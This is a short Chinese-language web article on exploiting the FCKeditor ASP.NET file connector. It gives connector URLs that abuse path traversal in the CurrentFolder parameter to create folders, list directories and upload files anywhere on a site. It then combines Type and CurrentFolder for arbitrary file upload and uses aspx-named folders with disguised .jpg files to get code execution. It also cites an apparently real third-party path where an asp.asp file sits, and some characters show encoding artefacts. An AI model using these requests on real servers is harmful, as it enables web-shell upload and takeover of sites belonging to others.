FCKeditor 新聞組件的一些程序漏洞

2024-09-06 19:16:32

字體：大中小

供稿：網(wǎng)友

1 CurrentFolder 參數(shù)，可以在網(wǎng)站中不同目錄新建文件夾，參數(shù)使用 ../../來篡改參數(shù)，進入不同的目錄
/browser/default/connectors/aspx/connector.aspx?Command=CreateFolder&Type=Image&CurrentFolder=../../..%2F&NewFolderName=aspx.asp

2 CurrentFolder 參數(shù)，根據(jù)返回的XML信息可以查看網(wǎng)站所有的目錄，比如 “../../../”進入不同的目錄，讓后通過XML返回的消息就可以看到?jīng)]有權(quán)限的頁面browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=%2F

3 上傳文件時，通過修改CurrentFolder參數(shù)，可以將文件上傳到不同的目錄
/browser/default/connectors/aspx/connector.aspx?Command=FileUpload&Type=Image&CurrentFolder=%2F

4 同時修改Type 和CurrentFolder 參數(shù)，可以上傳任意類型文件到網(wǎng)站任意目錄，基本上網(wǎng)站就完蛋了。
/browser/default/connectors/aspx/connector.aspx?Command=FileUpload&Type=Image&CurrentFolder=%2F

http://samsungfriend.local.opentide.com.cn/upload/fckroots/Image/asp.asp/asp.asp

5 通過創(chuàng)建文件夾的功能，創(chuàng)建名字帶有.aspx的文件夾，如：file.aspx等，利用文件解析漏洞，在該文件夾下上傳有代碼的.jpg 或.rar等文件（實際文件是.aspx，把文件名該后綴），上傳之后就可以利用漏洞執(zhí)行代碼了。如：www.xxx.com/upload/file.aspx/123.jpg 輸入之后，代碼被成功執(zhí)行。

上一篇：fckeditor php上傳文件重命名的設(shè)置

下一篇：FckEditor 配置手冊中文教程詳細說明